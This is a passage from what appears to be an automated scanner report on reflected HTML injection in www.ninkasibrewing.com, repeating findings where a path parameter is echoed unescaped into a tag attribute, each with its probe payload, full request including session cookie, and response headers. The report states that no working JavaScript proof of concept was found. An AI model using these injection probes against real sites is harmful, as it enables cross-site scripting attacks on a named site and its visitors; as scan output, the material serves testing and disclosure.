This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook90ee5"><a>3e6417b9771/content/js/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4808"><a>15a45105ef8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooke4808"><a>15a45105ef8/content/js/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d171a"><a>6ee7d9ed931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /helpd171a"><a>6ee7d9ed931/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:03 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88caf"><a>00b68d8c362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help88caf"><a>00b68d8c362/beer_finder/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:25 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8623a"><a>0cfef24a7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help8623a"><a>0cfef24a7a5/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6325e"><a>44db42daa5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help6325e"><a>44db42daa5a/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:29 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ae0"><a>a81cb64163d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help41ae0"><a>a81cb64163d/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6937c"><a>7458fba0b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help6937c"><a>7458fba0b6b/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e46"><a>dc8a43dd223 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help55e46"><a>dc8a43dd223/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:33 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99693"><a>74a561e9af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /help99693"><a>74a561e9af4/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215e5"><a>88974b7d081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home215e5"><a>88974b7d081/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c676"><a>e02e90da893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home1c676"><a>e02e90da893/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5e0"><a>d278f502dff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home9a5e0"><a>d278f502dff/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:36 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210e2"><a>b548d58de6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home210e2"><a>b548d58de6c/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dede"><a>1e7eb0352e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home8dede"><a>1e7eb0352e9/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbec0"><a>8202d7a7465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homefbec0"><a>8202d7a7465/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:42 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 663bc"><a>df79f9bb41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home663bc"><a>df79f9bb41c/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abf"><a>00dc92c2364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mediaf0abf"><a>00dc92c2364/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b99e"><a>d353410d2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media5b99e"><a>d353410d2d6/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a33"><a>5b783fa7801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media94a33"><a>5b783fa7801/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73fdc"><a>3284c577b00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media73fdc"><a>3284c577b00/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1309"><a>af44161986e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mediaf1309"><a>af44161986e/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:49 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba126"><a>4d385f007ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mediaba126"><a>4d385f007ef/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:49 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c3f"><a>1b1450f199e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
